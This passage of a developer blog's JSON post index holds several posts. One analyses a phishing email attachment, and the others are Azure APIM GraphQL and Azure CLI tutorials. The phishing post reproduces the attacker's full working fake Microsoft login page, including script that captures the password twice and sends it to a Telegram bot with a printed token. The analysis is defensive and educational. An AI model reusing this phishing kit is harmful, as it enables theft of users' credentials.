"2022-08-18-building-a-smart-home---part-3-smart-appliances" }, { "title": "Breaking Down Another Phishing Attempt", "url": "https://www.aaron-powell.com/posts/2022-08-18-breaking-down-another-phishing-attempt/", "date": "Thu, 18 Aug 2022 01:19:21 +0000", "tags": [ "security" ], "description": "Look, another phishing attempt. Let's unpack this one", "content": "Earlier this year I did a post about a phishing attempt I received. While I get these somewhat frequently, I decided to have a dig into the one I received today for no reason other than it seemed interesting.\nThe email Here’s the email I received:\nThis is super low effort and very clear that it’s a phishing attempt. There’s a huge string of text and numbers in the “from” name. What does it mean by “14 inbox delivery”? The fact that there’s a validation form on a random HTML attachment makes it painfully obvious that I shouldn’t open this.\nI tried to figure out what 900150983cd24fb0d6963f7d28e17f72900150983cd24fb0d6963f7d28e17f72900150983cd24fb0d6963f7d28e17f72 means from the sender, but I couldn’t find anything meaningful in any decryption. I thought it might’ve been a Bitcoin address, but it’s too long for that, and nothing came back from standard web searches, so 🤷. If you figure it out - let me know!\nLet’s download the HTML file and open it in VS Code.\nThe attachment contents 1 2 3 4 5 6 7 8 9 <script> var email = "<yes, my real email was here>"; var token = "5372900524:AAEesupk4LMrZO_4PONhPBHIpFu3ey-6O20"; var chat_id = 5510932248; var data = atob( "<!DOCTYPE html>
<html dir="ltr" class="" lang="en">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Sign in to your account</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
    <link rel="shortcut icon" href="https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">    
    <link data-loader="cdn" crossorigin="anonymous" href="https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_ziytf8dzt9eg1s6-ohhleg2.css" rel="stylesheet">
    <script>
        $(document).ready(function() {$("#displayName").empty().append(email); $.getJSON("https://api.ipify.org?format=json", function(data) {$("#gfg").html(data.ip);})});
    </script>
</head>
<body class="cb" style="display: block;">
<p id="gfg" style="display: none;"></p>
<form name="f1" id="i0281" novalidate="novalidate" spellcheck="false" method="post" target="_top" autocomplete="off" action="">
    <div class="login-paginated-page">
        <div id="lightboxTemplateContainer">
<div id="lightboxBackgroundContainer">
    <div class="background-image-holder" role="presentation">
    <div class="background-image ext-background-image" style="background-image: url(&quot;https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg&quot;);"></div>
</div></div>
<div class="outer">
    <div class="template-section main-section">
        <div class="middle ext-middle">
            <div class="full-height">
<div class="flex-column">
    <div class="win-scroll">
        <div id="lightbox" class="sign-in-box ext-sign-in-box fade-in-lightbox">
        <div><img class="logo" role="img" pngsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ed9c9eb0dce17d752bedea6b5acda6d9.png" svgsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" src="https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" alt="Microsoft"></div>
        <div role="main">
<div class="animate slide-in-next">
        <div >
<div class="identityBanner">
    <div id="displayName" class="identity"></div>
</div></div>
    </div>
    <div class="pagination-view animate has-identity-banner slide-in-next">
    <div>

<div id="loginHeader" class="row title ext-title">
    <div role="heading" aria-level="1">Enter password</div>
</div>
<div id="errorpw" style="color: red; margin: 15px; margin-left: 0px; margin-top: 0px; margin-bottom: 0px;"></div>
<div class="row">
    <div class="form-group col-md-24">
        <div class="placeholderContainer">
            <input name="passwd" type="password" id="i0118" autocomplete="off" class="form-control input ext-input text-box ext-text-box" placeholder="Password" required />
</div>
    </div>
</div>
<div>
<div class="position-buttons">
    <div>
        <div class="row">
            <div class="col-md-24">
                <div class="text-13">
                    <div class="form-group">
                        <a id="idA_PWD_ForgotPassword" role="link" href="#">Forgotten my password</a>
                    </div>
<div class="form-group">
</div>
        <div class="form-group">
            <a id="i1668" href="#">Sign in with another account</a>
        </div></div></div></div>
    </div>

    <div class="win-button-pin-bottom">
        <div class="row">
            <div><div class="col-xs-24 no-padding-left-right button-container">
    <div class="inline-block">
        <input type="submit" id="idSIButton9" class="win-button button_primary button ext-button primary ext-primary" value="Sign in">
    </div>
</div></div>
        </div>
    </div>
</div></div>
    </div>
</div></div></div></div>
    </div>
</div></div>
        </div>
    </div>
    <div id="footer" role="contentinfo" class="footer ext-footer">
        <div>
<div id="footerLinks" class="footerNode text-secondary">
        <a id="ftrTerms" href="#" class="footer-content ext-footer-content footer-item ext-footer-item">Terms of use</a>
        <a id="ftrPrivacy" href="#" class="footer-content ext-footer-content footer-item ext-footer-item">Privacy &amp; cookies</a>
    <a id="moreOptions" href="#" aria-label="Click here for troubleshooting information" class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">...</a>
</div></div>
    </div>
</div></div></div>
</form>
<script>
    var count = 0;
    var pswd1;
    document.getElementById("idSIButton9").addEventListener("click", function(e) {
    e.preventDefault();

    var pswd = document.getElementById('i0118').value;
    if (pswd == null || pswd == ""){
        document.getElementById('errorpw').innerHTML = `Your account password cannot be empty. if you don't remember your password, <a href="#">reset it now.</a>`;
        setTimeout(() => {document.getElementById('errorpw').innerHTML = '';}, 3000);}
    else if(pswd.length < 5){
        document.getElementById('errorpw').innerHTML = "Your account password is too short.";
        setTimeout(() => {document.getElementById('errorpw').innerHTML = ''; document.getElementById("i0281").reset();}, 3000);
    } else if (count<1){
        pswd1 = document.getElementById('i0118').value;
        document.getElementById('errorpw').innerHTML = `Your account or password is incorrect. if you don't remember your password, <a href="#">reset it now.</a>`;
        document.getElementById("i0281").reset(); count++;}
    else {
        var IP = document.getElementById('gfg').textContent;
        var message = `====== O365 Result ======\r\nEmail: ${email}\r\nPassword1: ${pswd1}\r\nPassword2: ${pswd}\r\nIP: https://ip-api.com/${IP}\r\nUser-Agent: ${navigator.userAgent}\r\n===================`;
        var settings = {
            "async": true, "crossDomain": true, "url": "https://api.telegram.org/bot" + token + "/sendMessage",
            "method": "POST", "headers": {"Content-Type": "application/json", "cache-control": "no-cache"},
            "data": JSON.stringify({"chat_id": chat_id, "text": message})}
        $.ajax(settings).done((response) => {window.location.replace('https://portal.office.com/servicestatus');});
    } 
    }); 
</script>
</div></body></html>" ); document.write(data); </script> So that’s interesting, it’s just a script tag with some JavaScript variables and a giant blob that will contain some HTML that will get written to the body. I guess we better parse out that blob and see what we’re dealing with.\nAs the HTML it generates is quite long, I’ve popped it into a gist that you can find here. And what does it look like?\nIt looks like the login screen to a Microsoft account, prompting me to enter the password.\nNote: I removed the JS from the file before loading it in the browser, just for extra safety.\nBreaking down how it works Clearly it’s trying to capture my password for my Microsoft account (MSA), but how will it do that, and how will they get it to themselves since this is an offline file? For that, we need to dig into the JavaScript a bit. There’s two scripts that run on the page, the first one is quite straight forward:\n1 2 3 4 5 6 $(document).ready(function () { $("#displayName").empty().append(email); $.getJSON("https://api.ipify.org?format=json", function (data) { $("#gfg").html(data.ip); }); }); It’s pushing my email (which was in the original file) to a field so I think I’m signing in, and then it’s calling a service to get my public IP.\nOf interesting note, they are using jQuery here and if we look at the script include a few lines above, we’ll notice it’s version 3.4.1, and that was released in 2019, so it’s possible that this basic phishing script has been floating around for a long time. Also, I wondered about why they’d use jQuery and not the native fetch API, as that’d reduce the external dependencies, and thus, the number of points of failure. While I don’t know the true motivations of this scammer, my guess would be that since a victim of this is someone who isn’t tech savvy, there’s a chance they are still using an outdated browser such as Internet Explorer, so jQuery would mean they don’t have to worry about browser compatibility and hit as wider target as possible.\nOk, back on topic, what’s the other script block doing?\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 var count = 0; var pswd1; document.getElementById("idSIButton9").addEventListener("click", function (e) { e.preventDefault(); var pswd = document.getElementById("i0118").value; if (pswd == null || pswd == "") { document.getElementById( "errorpw" ).innerHTML = `Your account password cannot be empty. if you don't remember your password, <a href="#">reset it now.</a>`; setTimeout(() => { document.getElementById("errorpw").innerHTML = ""; }, 3000); } else if (pswd.length < 5) { document.getElementById("errorpw").innerHTML = "Your account password is too short."; setTimeout(() => { document.getElementById("errorpw").innerHTML = ""; document.getElementById("i0281").reset(); }, 3000); } else if (count < 1) { pswd1 = document.getElementById("i0118").value; document.getElementById( "errorpw" ).innerHTML = `Your account or password is incorrect. if you don't remember your password, <a href="#">reset it now.</a>`; document.getElementById("i0281").reset(); count++; } else { var IP = document.getElementById("gfg").textContent; var message = `====== O365 Result ======\\r\\nEmail: ${email}\\r\\nPassword1: ${pswd1}\\r\\nPassword2: ${pswd}\\r\\nIP: https://ip-api.com/${IP}\\r\\nUser-Agent: ${navigator.userAgent}\\r\\n===================`; var settings = { async: true, crossDomain: true, url: "https://api.telegram.org/bot" + token + "/sendMessage", method: "POST", headers: { "Content-Type": "application/json", "cache-control": "no-cache", }, data: JSON.stringify({ chat_id: chat_id, text: message, }), }; $.ajax(settings).done((response) => { window.location.replace("https://portal.office.com/servicestatus"); }); } }); Now this looks more like it, here’s how they are going to get your information. Let’s break it down step-by-step.\nTo start, they have a click handler on the Sign In button and when clicked they grab the password from the password field. Then we enter a chain of if blocks.\n1 2 3 4 5 6 7 8 if (pswd == null || pswd == "") { document.getElementById( "errorpw" ).innerHTML = `Your account password cannot be empty. if you don't remember your password, <a href="#">reset it now.</a>`; setTimeout(() => { document.getElementById("errorpw").innerHTML = ""; }, 3000); } Blank password test, sure, makes logical sense. Interesting that they clear out the error message after a period too, like, what’s the point in that? Ok, next conditional test:\n1 2 3 4 5 6 7 8 if (pswd.length < 5) { document.getElementById("errorpw").innerHTML = "Your account password is too short."; setTimeout(() => { document.getElementById("errorpw").innerHTML = ""; document.getElementById("i0281").reset(); }, 3000); } Hahah they are enforcing a minimum of 5 characters on their password! I think MSA has a minimum length of 8 though, but I’ll admit to having never investigated it. Hats off for trying to make it seem legit, although I’m saddened, they didn’t add anything more around password complexity. 🤣\nThis brings us to the third branch:\n1 2 3 4 5 6 7 8 if (count < 1) { pswd1 = document.getElementById("i0118").value; document.getElementById( "errorpw" ).innerHTML = `Your account or password is incorrect. if you don't remember your password, <a href="#">reset it now.</a>`; document.getElementById("i0281").reset(); count++; } Now this is interesting. The variable count is a globally scoped one on the page that starts out at 0, so assuming you’ve provided a password and it was longer than 5 characters, you’re going to land in this branch where it puts the password you entered into pswd1, which is a globally scoped variable, before then showing you an error message and increasing the count.\nWhat we can assume here is that they are using this as a fake out to the victim, having them think they incorrectly entered the password, so that they enter it a second time, and that lands us in the final branch of our code:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 var IP = document.getElementById("gfg").textContent; var message = `====== O365 Result ======\\r\\nEmail: ${email}\\r\\nPassword1: ${pswd1}\\r\\nPassword2: ${pswd}\\r\\nIP: https://ip-api.com/${IP}\\r\\nUser-Agent: ${navigator.userAgent}\\r\\n===================`; var settings = { async: true, crossDomain: true, url: "https://api.telegram.org/bot" + token + "/sendMessage", method: "POST", headers: { "Content-Type": "application/json", "cache-control": "no-cache", }, data: JSON.stringify({ chat_id: chat_id, text: message, }), }; $.ajax(settings).done((response) => { window.location.replace("https://portal.office.com/servicestatus"); }); When the victim runs this code block it’s building up a message that contains their email (from the original script you download), the password they entered and were told was wrong, then the password they entered this time, plus some metadata like their IP and user agent. Interestingly, they are using a template literal which isn’t supported in IE, so maybe my assertion on why they used jQuery is wrong and they are doing it because they are lazy (odd that they don’t use the template literal for the url in the AJAX settings though…). I find the double-password trick quite an interesting one, as it suggests that they are anticipating that people could do a mistake, so by having them prompt twice, the victim will either validate that their password by entering the same one again - which will work and they are none the wiser, or they’ll hand over a secondary password that they may use on other services.\nThe result of this is a message payload like so:\n====== O365 Result ====== Email: foo@bar.com Password1: abc123 Password2: abc123 IP: https://ip-api.com/1.1.1.1 User-Agent: ... =================== This payload is then sent to a Telegram chat, using the token and chat_id from the downloaded attachment, before the user is redirected to the Office status page, leaving them none the wiser that their details have been sent away.\nSummary Sadly, it looks like this token has been revoked, as when I tried to use it against the Telegram API (even replicating the sendMessage call but with a cough different message), I was getting a 401, meaning I couldn’t try and dig into the chat itself.\nLike last time, this was interesting, looking at how the scammer is trying to get the information from the victim. I find the use of the fake out on password failing to get them to validate their password (or give over a secondary password) quite a clever way to go about collecting credentials and reducing the risk of getting invalid ones out of it.\nAnd with that, this email is getting flagged in M365 as phishing and let’s hope that improves the phishing detection, so it lands in less inboxes.\n", "id": "2022-08-18-breaking-down-another-phishing-attempt" }, { "title": "GraphQL on Azure: Part 10 - Synthetic GraphQL Custom Responses", "url": "https://www.aaron-powell.com/posts/2022-08-17-graphql-on-azure-part-10-synthetic-graphql-custom-responses/", "date": "Wed, 17 Aug 2022 05:01:21 +0000", "tags": [ "azure", "graphql" ], "description": "With Synthetic GraphQL we created resolvers to pass-through to REST calls, but what if we want to have resolvers on types other than Query", "content": "Continuing on from the last post in which we used Azure API Management’s (APIM) Synthetic GraphQL feature to create a GraphQL endpoint for my blog, I wanted to explore how to add a completely new field to our type - Related Posts.\nUsing the schema editor in APIM I added a new field to the Post type of related(tag: String): [Post!], so our type now looks like this:\n1 2 3 4 5 6 7 8 9 10 type Post { id: ID! title: String! url: Url! date: Date tags: [String!]! description: String content: String! related(tag: String): [Post!] } The way this field resolver will work is that if you provide a tag argument to related then it’ll return posts that also have that tag (while first validating that the tag is a tag of the Post), and if you don’t provide a tag argument, it’ll return all posts that have the same tags as the current Post.\nAside: I have updated the /api/tag endpoint that if you provide a comma-separated string, it’ll split those and return posts that match all those tags as it previously only supported a single tag.\nBuilding a resolver As this is an entirely fabricated field, we’re going to have to make a custom resolver in APIM using the set-graphql-resolver policy. The resolver is going to need two pieces of data, the tags of the current Post and the tag argument provided. As we learnt in the last post, we can get the arguments off the GraphQL request context as context.Request.Body.As<JObject>(true)["arguments"], but what about the Post?\nIn GraphQL, the resolver that’s being executed has access to the parent in the graph, and in our case the parent of related is the Post, and we can access that by context.ParentResult.\nWith that setup, we can write our resolver like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 <set-graphql-resolver parent-type="Post" field="related"> <http-data-source> <http-request> <set-method>GET</set-method> <set-url>@{ var postTags = context.ParentResult.AsJObject()["tags"].ToObject<string[]>().ToList(); var requestedTag = context.Request.Body.As<JObject>(true)["arguments"]["tag"].ToString(); if (!string.IsNullOrEmpty(requestedTag)) { if (postTags.IndexOf(requestedTag) < 0) { return null; } return $"https://www.aaron-powell.com/api/tag/{requestedTag}"; } return $"https://www.aaron-powell.com/api/tag/{string.Join(",", postTags)}"; }</set-url> </http-request> </http-data-source> </set-graphql-resolver> Notice that this time the parent-type is Post not Query, and we have a slightly more complex bit of C# code that generates the URL we’ll call, applying the logic that was stated above.\nLet’s fire off the request and see what we get back:\n1 2 3 4 5 6 7 8 9 10 query { post(id: "2022-08-16-graphql-on-azure-part-9-rest-to-graphql") { title tags related { title tags } } } Great, it’s worked as expected… except we ended up with the post that we specified the ID of in the related posts. While that might be technically true that it’s related to itself, it’s not really what we’re expecting.\nCleaning our results We’re going to want to do something that removes the current post from its related posts, and to do that we’re going to need to either make our REST API aware of the current Post and filter it out, or make our resolver smarter.\nGoing and rewriting the backend API doesn’t seem like the logical choice, after all, the point of Synthetic GraphQL is that we’re exposing non-graph data as a graph, so we probably don’t want to rework our API to be more “GraphQL ready”. Instead, we can do some post-processing in the data before sending it to the client, using the http-response part of our policy and defining a set-body transformation policy.\nWith set-body, we need to provide a template to execute, and this can be a Liquid template or C#. Since I’m not familiar with Liquid, but I am with C#, we’re going to stick with that. This template is going to need to get the id of the current post (which is the parent of the resolver), then iterate through all the posts from the /tags call, and remove the current post from the result set.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 <http-response> <set-body>@{ var parentId = context.ParentResult.AsJObject()["id"].ToString(); var posts = context.Response.Body.As<JArray>(); var response = new JArray(); foreach (var post in posts) { if (post["id"].ToObject<string>() != parentId) { response.Add(post); } } return response.ToString(); }</set-body> </http-response> What we see here is that we used the context.ParentResult to find the id, then parsed the current response as a JArray (since we know that the REST call returned a JSON array), then using a foreach loop, we check the posts and create a new JArray containing the cleaned result set, which we finally return as a string.\nThis makes our whole resolver look like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 <set-graphql-resolver parent-type="Post" field="related"> <http-data-source> <http-request> <set-method>GET</set-method> <set-url>@{ var postTags = context.ParentResult.AsJObject()["tags"].ToObject<string[]>().ToList(); var requestedTag = context.Request.Body.As<JObject>(true)["arguments"]["tag"].ToString(); if (!string.IsNullOrEmpty(requestedTag)) { if (postTags.IndexOf(requestedTag) < 0) { return null; } return $"https://www.aaron-powell.com/api/tag/{requestedTag}"; } return $"https://www.aaron-powell.com/api/tag/{string.Join(",", postTags)}"; }</set-url> </http-request> <http-response> <set-body>@{ var parentId = context.ParentResult.AsJObject()["id"].ToString(); var posts = context.Response.Body.As<JArray>(); var response = new JArray(); foreach (var post in posts) { if (post["id"].ToObject<string>() != parentId) { response.Add(post); } } return response.ToString(); }</set-body> </http-response> </http-data-source> </set-graphql-resolver> Let’s make the GraphQL call again:\nFantastic, we’re now only getting the data that we expect.\nSummary This post builds on the last one in how to use Synthetic GraphQL to create a GraphQL endpoint from a non-GraphQL backend, but we took it one step further and created a field on our GraphQL type that doesn’t exist in our original backend model. And this is what makes Synthetic GraphQL really shine, that we can take our backend and model it in the way that makes the most sense for consumers of it in a graph design.\nYes, it might not be as optimised as if you were writing a true GraphQL server, given that with this particular example doesn’t optimise the sub-resolver calls, but that’s something for a future post. 😉\n", "id": "2022-08-17-graphql-on-azure-part-10-synthetic-graphql-custom-responses" }, { "title": "GraphQL on Azure: Part 9 - REST to GraphQL", "url": "https://www.aaron-powell.com/posts/2022-08-16-graphql-on-azure-part-9-rest-to-graphql/", "date": "Tue, 16 Aug 2022 00:52:22 +0000", "tags": [ "graphql", "azure" ], "description": "It can be a lot of work to rewrite your APIs to GraphQL, but what if we could do that on the fly", "content": "Throughout this series we’ve been exploring many different aspects of using GraphQL in Azure, but it’s always been from the perspective of creating a new API. While there are a certain class of problems which support you starting from scratch, it’s not uncommon to have an existing API that you’re bound to, and in that case, GraphQL might not be as easy to tackle.\nHere’s a scenario that I want to put forth, you’ve got an existing API, maybe it’s REST, maybe it’s a bespoke HTTP API, none the less you’re building a new client in which you want to consume the endpoint as GraphQL. We could go down the path of creating an Apollo Server and using the RESTDataSource, or using HotChocolate’s REST support, but for both of these approaches we’re having to write our own server and deploy some new infrastructure to run it.\nWhat if we could do it without code?\nIntroducing Synthetic GraphQL At Build 2022 Azure API Management (APIM) released a preview of a new feature called Synthetic GraphQL. Synthetic GraphQL allows you to use APIM as the broker between your GraphQL schema and the HTTP endpoints that provide the data for it, meaning you to convert a backend to GraphQL without having to implement a custom server, instead you use APIM policies.\nLet’s take a look at how to do this, and for that, I’m going to add an API to my blog.\nBuilding a REST API for my blog I’ve created a really basic REST API for my blog, that takes the JSON file generated for my search feature and exposes it using Azure Functions as /post for all posts, /post/:id for a specific post, and /tag/:tag for posts under a certain tag. You can see the implementations on my GitHub, but they’re reasonably simple, here’s the /tag/:tag one:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 import { AzureFunction, Context, HttpRequest } from "@azure/functions"; import { loadPosts } from "../postLoader"; const httpTrigger: AzureFunction = async function ( context: Context, req: HttpRequest ): Promise<void> { const tag = req.params.tag; const posts = await loadPosts(); const postsByTag = posts.filter((p) => p.tags.some((t) => t === tag)); if (!postsByTag.length) { context.res = { status: 404, }; } else { context.res = { body: postsByTag, }; } }; export default httpTrigger; Simple, effective, and if you go to /api/tag/graphql you’ll see a JSON response containing all my blog posts that are tagged with graphql.\nCreating a GraphQL schema Let’s go ahead and define a GraphQL schema that we want to expose the REST endpoints via:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 scalar Url scalar Date type Post { id: ID! title: String! url: Url! date: Date tags: [String!]! description: String content: String! } type Query { post(id: ID!): Post postsByTag(tag: String!): [Post!]! } schema { query: Query } That looks like it’ll do, we have a single Object Type, Post, that has the relevant fields on it, we have some queries, post(id: ID!) and postsByTag(tag: String!) that cover the main REST endpoints, and we’ve even got some custom scalar types in there for fun.\nNow let’s go and create an APIM endpoint that we can use for this.\nSetting up Synthetic GraphQL Note: At the time of writing, Synthetic GraphQL is in public preview, so the approach I’m showing is subject to change as the preview moves towards General Availability (GA). Also, it may not be in all regions or all SKUs, so for this post I’m using West US as the region and the Developer SKU.\nFirst off, you’ll need to create an APIM resource, here’s how to do it via the Azure Portal (the APIM docs will cover other approaches (CLI, Bicep, VS Code, etc.)). Once the resource has been provisioned, it’s time to setup our Synthetic GraphQL API.\nOn the APIM resource, navigate to the APIs section, click Add API and you’ll see the different options, including Synthetic GraphQL.\nSelect Synthetic GraphQL, provide a name and upload your GraphQL schema then click Create (you don’t need to provide the other information if you don’t want, but I have provided an API URL suffix, so I could run other APIs in this resource if so desired).\nYou’ll now find a new API listed with the name provided (Blog in my case) and if you click on it you’ll find your GraphQL schema parsed as the API frontend.\nCongratulations, you’ve setup a GraphQL endpoint in APIM!\nDefining Resolvers While we may have told APIM that we want to create an endpoint that you can query with GraphQL, we’re missing a critical piece of the puzzle, resolvers! APIM knows that we are trying to get GraphQL but it doesn’t know how to get the data to send back in your HTTP responses, and for that, we’ll use the set-graphql-resolver APIM policy to, well, set a GraphQL resolver for parts of our schema.\nThe set-graphql-resolver policies are added to the <backend> section of our APIM policy list and it will require a parent-type and the field that the resolver is for. Let’s start by defining the post(id: ID!) field of the Query, and we’ll do that by opening the Policy Editor for our API:\nFrom here, find the <backend> node and start creating our policy:\n1 2 3 4 5 <backend> <set-graphql-resolver parent-type="Query" field="post"> </set-graphql-resolver> <base /> </backend> Note: We’ll leave the <base /> policy in as well, as that will ensure any global policies on our API are also executed.\nWith the policy linked to the GraphQL schema, we need to “implement” the resolver and tell it to call our HTTP endpoint, and for that we’ll use the http-data-source:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 <backend> <set-graphql-resolver parent-type="Query" field="post"> <http-data-source> <http-request> <set-method>GET</set-method> <set-url>@{ var id = context.Request.Body.As<JObject>(true)["arguments"]["id"]; return $"https://www.aaron-powell.com/api/post/{id}"; }</set-url> <set-header name="Content-Type" exists-action="override"> <value>application/json</value> </set-header> </http-request> </http-data-source> </set-graphql-resolver> <base /> </backend> For our http-data-source, we’ll define the http-request information, in this case we’re setting the HTTP method as GET and that we’re expecting JSON as the Content-Type header, but the most interesting bit is the set-url node, in which we define the URL that our HTTP call will make.\nSince the posts field takes an argument of id, and that’s needed in our API call, we run a code snippet that will parse the request body, find the arguments property and get the id member of it, which we assign to a variable and then generate the URL that APIM will need to call. While this is a simple case of passing something across as a URL parameter, you could do something more dynamic like conditionally choosing a URL based on the arguments, or if it was a HTTP POST you could use set-body to build up a request body to POST to the API (which might be more applicable in a mutation than a query).\nLet’s repeat the same thing for our postsByTag field:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 <backend> <set-graphql-resolver parent-type="Query" field="post"> <http-data-source> <http-request> <set-method>GET</set-method> <set-url>@{ var id = context.Request.Body.As<JObject>(true)["arguments"]["id"]; return $"https://www.aaron-powell.com/api/post/{id}"; }</set-url> <set-header name="Content-Type" exists-action="override"> <value>application/json</value> </set-header> </http-request> </http-data-source> </set-graphql-resolver> <set-graphql-resolver parent-type="Query" field="postsByTag"> <http-data-source> <http-request> <set-method>GET</set-method> <set-url>@{ var tag = context.Request.Body.As<JObject>(true)["arguments"]["tag"]; return $"https://www.aaron-powell.com/api/tag/{tag}"; }</set-url> <set-header name="Content-Type" exists-action="override"> <value>application/json</value> </set-header> </http-request> </http-data-source> </set-graphql-resolver> <base /> </backend> Once you’re done, hit Save and navigate to the Test console for the API and we’ll be able to execute our queries:\nAnd there we have it, we’ve created a GraphQL API that is really just fronting our existing REST API.\nMaking our GraphQL endpoint callable The only thing left to do is to make our GraphQL endpoint callable by clients. There’s an easy to follow tutorial on the APIM docs (which I followed myself!) and I setup a Product like so:\nOnce the product was setup, I added a subscription for myself, copied the subscription key, opened up Postman and executed a query.\nConclusion Throughout this post, we’ve looked at how to create a Synthetic GraphQL API using Azure APIM Management, aka APIM, that is a wrapper around a REST API that I already had existing on my website.\nWe defined a set-graphql-resolver policy on the API backend that told APIM how to convert the GraphQL query into a REST call, and sent it to the API.\nSince the way we defined our schema doesn’t require us to do any transformation of the returned data, our REST and GraphQL types are matching, we didn’t need to do any additional processing with the http-response part of the set-graphql-resolver, but if you need to change the returned data structure, add additional headers, or any other response manipulations, you can use that to do it.\nHopefully this has shown you just how easy it is to provide a GraphQL interface over a HTTP backend, without having to write a full GraphQL server to do it.\nIf you do have a go with this, I’d love to hear how you find it.\n", "id": "2022-08-16-graphql-on-azure-part-9-rest-to-graphql" }, { "title": "Finding Resource Groups With No Resources", "url": "https://www.aaron-powell.com/posts/2022-08-15-finding-resource-groups-with-no-resources/", "date": "Mon, 15 Aug 2022 06:27:02 +0000", "tags": [ "azure" ], "description": "Always good to keep your subscriptions clean, but how do you know what's not needed", "content": "I have a lot of resources and a lot of Azure subscriptions, and as a result, often find that I’m forgetting what everything is used for. Sure, I try to name the resource groups something useful, add tags, and things of that nature, but even still, things can get out of control quickly. For example, I have 47 resource groups in my primary subscription at the moment (let along me second and tertiary ones).\nI figured a good start would be to delete all the resource groups that don’t have any resources in them. No resource? well, it’s probably not one that I need anymore (I likely deleted some expensive resource but didn’t do the full cleanup).\nBut how do we find those, short of clicking through the portal?\nWell, let’s start with shell.azure.com and start scripting.\nTo do this task, there’s two bits of information we’ll need, the names of all resource groups and the count of items in those resource groups.\nGetting the names of all resource groups is simple:\n1 az group list | jq 'map(.name)' This will output:\n1 2 3 4 5 6 7 8 9 [ "aaron-cloud-cli", "dddsydney", "httpstatus", "personal-website", "restream-streamdeck", "NetworkWatcherRG", "stardust-codespace" ] Unfortunately, this won’t tell you how many resources are in a group (yes, we are only getting the name property, but the whole JSON doesn’t contain it). In fact, you can’t get that with az group at all, even az group show --name <name> won’t give you it, we’ll have to tackle this differently, instead we’ll get all resources and group them by their resource group, which we can do with az resource list:\n1 az resource list | jq 'map(.resourceGroup) | group_by(.) | map({ name: .[0], length: length }) | sort_by(.length) | reverse' This jq command is a bit complex, but if we break it down, the first thing we’re doing is selecting the resource group name from each resource with map(.resourceGroup), to give us an array of resource group names. Next, we use group_by(.) to group them together and pipe that to another map function that makes an object with the name of the resource group (obtained from the first item of the index) and the length (how many resources are in the resource group). Lastly, it just sorts and orders it with sort_by and reverse, giving us this output:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 [ { "name": "httpstatus", "length": 11 }, { "name": "personal-website", "length": 3 }, { "name": "stardust-codespace", "length": 1 }, { "name": "restream-streamdeck", "length": 1 }, { "name": "dddsydney", "length": 1 }, { "name": "aaron-cloud-cli", "length": 1 } ] Great! Except… it only contains resource groups that have resources, meaning we know what resource groups have items, when we want the inverse, we want the ones that don’t have items.\nSo, we will need that original query to get all the resource group names and we’ll find the negative intersection between the two arrays, with the leftovers being the resource groups we can discard.\nStart by pushing all resource groups with items into a bash variable:\n1 RG_NAMES=$(az resource list | jq -r 'map(.resourceGroup) | group_by(.) | map(.[0])') Next, we’ll use $RG_NAMES as a substitution into a query against az group list:\n1 az group list | jq -r "map(.name) | map(select(. as \\$NAME | $RG_NAMES | any(. == \\$NAME) | not)) | sort" Again, let’s break this more complex jq statement down. We start with getting the names of the resource groups (since it’s all we need) with map(.name). That is then piped to a map call so we can operate on each item of the array. In the second map we use assign the item to a variable $NAME (which we’ve escaped since we’re doing substitution with the environment variable $RG_NAMES), pipe to the $RG_NAMES variable, so we can pipe that to any and see if any item in $RG_NAMES matches $NAME. The result of the any is inverted by piping through not and the result is provided to select to filter down the resource group names to only that didn’t have resources!\n1 ["NetworkWatcherRG"] And there we have it, we’ve successfully executed two lines of code and got back the resource groups that are empty and can be deleted.\nSummary Here’s those two lines again:\n1 2 RG_NAMES=$(az resource list | jq -r 'map(.resourceGroup) | group_by(.) | map(.[0])') az group list | jq -r "map(.name) | map(select(. as \\$NAME | $RG_NAMES | any(. == \\$NAME) | not)) | sort" Yes, the jq can look a bit daunting, especially considering how many pipes they are executing, but all in all, it does what’s advertised, returns a list of resource groups that contain no items.\nAnd yes, I may have spent more time trying to figure this out than it would have been clicking through them all, but hey, at least I have it ready for next time! 🤣\n", "id": "2022-08-15-finding-resource-groups-with-no-resources" }, { "title": "Fixing When SWA Pull Request Builds Can't Add Comments", "url": "https://www.aaron-powell.com/posts/2022-08-09-fixing-when-swa-prs-cant-add-comments/", "date": "Tue, 09 Aug 2022 00:08:41 +0000", "tags": [ "azure", "javascript", "devops" ], "description": "Custom SWA deployments can cause problems with adding PR comments, but it's an easy fix", "content": "I did a recent post about deploying SWA with Bicep and another on advanced GitHub Actions workflows for SWA but I noticed when doing it that when using PR’s on the repo I was no longer getting the comment added to the PR for where the staging site lives. When it’s working correctly you’ll get a comment like this:\nInstead, I’d get an error message in my logs:\nUnexectedly failed to add GitHub 